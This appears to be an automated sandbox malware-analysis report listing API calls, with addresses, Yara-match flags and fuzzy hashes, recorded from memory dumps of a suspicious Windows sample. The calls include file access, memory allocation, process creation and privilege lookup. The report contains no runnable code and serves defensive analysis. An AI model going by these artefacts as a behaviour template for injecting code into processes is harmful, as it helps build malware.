                                        • API String ID: 3298025750-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00B43BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B43BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00B4861D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(00B43D82,5E972F65,FFFFFFFF,00B43A41,?,?,00B43D82,?,00B43A41,FFFFFFFF,5E972F65,00B43D82,?,00000000), ref: 00B486C5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00B32D11,00002000,00003000,00000004), ref: 00B487E9
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00B43D60,?,?,00B43D60,00000000,FFFFFFFF), ref: 00B48725
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
                                        • Instruction ID: 23148912c38018e9af9bf58c4b1e51c51429036c9a2a08c7ec551392ae37258c
                                        • Opcode Fuzzy Hash: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
                                        • Instruction Fuzzy Hash: BD9002B120100623F11161594504707011B97D028DFE1C412A0425598D9A96D962B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
                                        • Instruction ID: ac80f2818a1fda4188c185d925ec0576f98c7e963c602de9545b82b6eb0c1306
                                        • Opcode Fuzzy Hash: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
                                        • Instruction Fuzzy Hash: 799002E120200213610571594414616411B97E024DBA1C021E10155D0DC965D8A17165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
                                        • Instruction ID: 71077915487ca4632a836647f676a2c53e1b38b5cfe2f67818aae3a19d032a23
                                        • Opcode Fuzzy Hash: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
                                        • Instruction Fuzzy Hash: CA9002E134100652F10061594414B060117D7E134DFA1C015E1065594D8A59DC627166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
                                        • Instruction ID: 5d83952527ce3397d79d72b5a3ec18b430eddc61fa333b9fd0eee04638f9508e
                                        • Opcode Fuzzy Hash: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
                                        • Instruction Fuzzy Hash: 659002A5211002132105A5590704507015797D539D3A1C021F1016590CDA61D8716161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
                                        • Instruction ID: 63b4ea3b68bfade3d93f172e2179a648d69dca7662fb979426209cc038ef7d17
                                        • Opcode Fuzzy Hash: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
                                        • Instruction Fuzzy Hash: B59002F120100612F14071594404746011797D034DFA1C011A5065594E8A99DDE576A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
                                        • Instruction ID: 29889c36b4d173f1a3f0b3b4fe934ec613a9014ac78c968f879b1e4ef2a684a0
                                        • Opcode Fuzzy Hash: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
                                        • Instruction Fuzzy Hash: 139002B120100A52F10061594404B46011797E034DFA1C016A0125694D8A55D8617561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
                                        • Instruction ID: 932e53da20fabd7a49bb42c7948366fd3dfb05b5be342c2f566c1345edc55819
                                        • Opcode Fuzzy Hash: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
                                        • Instruction Fuzzy Hash: DF9002B120108A12F1106159840474A011797D034DFA5C411A4425698D8AD5D8A17161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
                                        • Instruction ID: 0072e6171845b6b5dabd29681e6909c4a1dd44727f78823041bcec11597987fd
                                        • Opcode Fuzzy Hash: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
                                        • Instruction Fuzzy Hash: A99002A121180252F20065694C14B07011797D034FFA1C115A0155594CCD55D8716561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
                                        • Instruction ID: 97c8a9d0758ed0c5f317e6d8c2c0b546e9285bd067404f1b74d7f1edf158bbd0
                                        • Opcode Fuzzy Hash: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
                                        • Instruction Fuzzy Hash: B99002B120504A52F14071594404A46012797D034DFA1C011A00656D4D9A65DD65B6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
                                        • Instruction ID: bf985a61a0d1439e6bc7748c2c2376a440669fa79d13f9e0027685fbd155dad6
                                        • Opcode Fuzzy Hash: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
                                        • Instruction Fuzzy Hash: 549002B120100A12F1807159440464A011797D134DFE1C015A0026694DCE55DA6977E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
                                        • Instruction ID: 95e50ab4aff33f4d89e1cf7f08c64aee2f17e28c414c74d972386e26d35a1529
                                        • Opcode Fuzzy Hash: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
                                        • Instruction Fuzzy Hash: 0A9002B131114612F11061598404706011797D124DFA1C411A0825598D8AD5D8A17162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
                                        • Instruction ID: 28201656ec5571076c3e9f220d6d44094299ecd98bea4e31f89d8bae4208ff6a
                                        • Opcode Fuzzy Hash: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
                                        • Instruction Fuzzy Hash: 389002A921300212F1807159540860A011797D124EFE1D415A0016598CCD55D8796361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
                                        • Instruction ID: c5f3ce56b9428732868af98e08d5372f1750d3401f2ad1afffa42953451fb8f5
                                        • Opcode Fuzzy Hash: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
                                        • Instruction Fuzzy Hash: AD9002B120100612F10065995408646011797E034DFA1D011A5025595ECAA5D8A17171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • Sleep.KERNELBASE(000007D0), ref: 00B47398
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: net.dll$wininet.dll
                                        • API String ID: 3472027048-1269752229
                                        • Opcode ID: 4109aba29892d9a41d8a8ea6d4bc3df00a566ab45680f5712ed041a14dd189d6
                                        • Instruction ID: 35cf0f498581d8fa3a3938a84512aaf87899738ca771604f53056f9ecd96337e
                                        • Opcode Fuzzy Hash: 4109aba29892d9a41d8a8ea6d4bc3df00a566ab45680f5712ed041a14dd189d6
                                        • Instruction Fuzzy Hash: 0131B0B6541604ABC711DF68C8A1FABB7F8EF48700F00855DFA1A9B241D730A646DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • Sleep.KERNELBASE(000007D0), ref: 00B47398
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: net.dll$wininet.dll
                                        • API String ID: 3472027048-1269752229
                                        • Opcode ID: bf1d5d5734a5e64824b6a516e40b8a4e9afad9a01973cbb77550ae310feb90f1
                                        • Instruction ID: 0d1acce24bd0614e6cfca1332da76b2abdec8c11f9d76d9a4cdc3fcb9c8f1a45
                                        • Opcode Fuzzy Hash: bf1d5d5734a5e64824b6a516e40b8a4e9afad9a01973cbb77550ae310feb90f1
                                        • Instruction Fuzzy Hash: DE2104B2645200ABD711DF68C8A1FABBBF4FF48700F10815DFA1D9B281D770A946DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00B33B93), ref: 00B4890D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 0bb6cfa7a34bb4dd9619f16e4da0051428f94c0b7b4bffa01469112dba252c21
                                        • Instruction ID: ff5e78d33c3b68aac77b8e3660a68bf2d7e7559adbf8938d45e2f6b5f7281549
                                        • Opcode Fuzzy Hash: 0bb6cfa7a34bb4dd9619f16e4da0051428f94c0b7b4bffa01469112dba252c21
                                        • Instruction Fuzzy Hash: D6E06DB56002057FE719DF94DC49E977798EF88350F008A99FD1C5B651D630E960CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00B33B93), ref: 00B4890D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: 8f2025fd55551da632ce28e8dd4f9fa174e10327444693e5c237cdf8d2ea78fc
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: 89E04FB12002087BD718DF59DC49EA777ACEF88750F014554FD0857241C630F910CAF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00B372EA
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00B3730B
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                        • Instruction ID: 132b325c4bff224399371427c407dde38a796d3cb92aa1a295a38a2529c3613e
                                        • Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                        • Instruction Fuzzy Hash: EF018F71A8022876E721AA949C03FBE77AC9B00B51F140198FF04BA1C1EAE46A0647F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00B372EA
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00B3730B
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
                                        • Instruction ID: 93746e03958e00929d6a9f8d29fc40c86a5f39131699f23f8bd0a0ec30aa5c89
                                        • Opcode Fuzzy Hash: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
                                        • Instruction Fuzzy Hash: E3F0E271BC92247AE73296945C03FBA77989B41F10F25009AFF04FA1C1EAA46A1246F9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00B3CFD2,00B3CFD2,?,00000000,?,?), ref: 00B48A70
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
                                        • Instruction ID: 5cef17b339c0b10a5de3da3c116161d09843e08488d7d986c61ef955ca135588
                                        • Opcode Fuzzy Hash: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
                                        • Instruction Fuzzy Hash: 5E0126B52042546FCB14DF54AC89DE73BACEF40310F144A8AFC4917202C974EA14C7F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00B39BC2
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                        • Instruction ID: 19d28b9421714435d7ffa139df3fe00adc5f712050b0bdcf99f7121f613062e8
                                        • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                        • Instruction Fuzzy Hash: 42011EB5D4020DABDF10DBA5EC42F9EB7B89B54308F1041D5E91897241F671EB18DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B489A4
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: 5cae90ce4dab01fc2f18b47f0d61392e4f0b3db3fa79cd9fd813279df95a4a37
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: A301AFB2210108BBCB58DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00B3CD00,?,?), ref: 00B4745C
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                        • Instruction ID: e2437c75ddb30168124590ec81c2a5fc84633d021db5c939f421635d3a2c9d26
                                        • Opcode Fuzzy Hash: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                        • Instruction Fuzzy Hash: 31E06D333852143AE220659DAC03FA7B2DCCB91B20F540066FA0DEA2C1D995F90142A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00B43546,?,00B43CBF,00B43CBF,?,00B43546,?,?,?,?,?,00000000,00000000,?), ref: 00B488CD
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: 3ae1b6561d6167d216dad33e17bf857b7f60d38e6d276cc34190020adfc0532f
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 0FE012B1200208ABDB18EF99DC45EA777ACAF88650F118598BE086B242C630F910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00B3CFD2,00B3CFD2,?,00000000,?,?), ref: 00B48A70
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: 0043e1c57dac9ed16ab5f04a266bb806c179f1d7d010aa48f65490b121ced083
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: EDE01AB12002086BDB14DF49DC85EE737ADAF88650F018154BE0867241C930F9108BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,?,00B37C93,?), ref: 00B3D46B
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                        • Instruction ID: 8a1eb4aea50aec4dc2767c6962b02dc540ddf0f36297caac29814266b8abf806
                                        • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                        • Instruction Fuzzy Hash: D8D0A7717903083BE610FAA8DC03F2632CC9B44B00F4940A4F949E73C3D960F5004171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                        • Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp
                                        • Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
                                        • Instruction ID: ca7915b08c01192e267c772392607ee56a8e1d5623cee07a07fba845d1ea4181
                                        • Opcode Fuzzy Hash: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
                                        • Instruction Fuzzy Hash: 75B02BF18010C2D5FB00D760060C7173A1277C0308F22C051D1030280A0738D090F1B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 53%
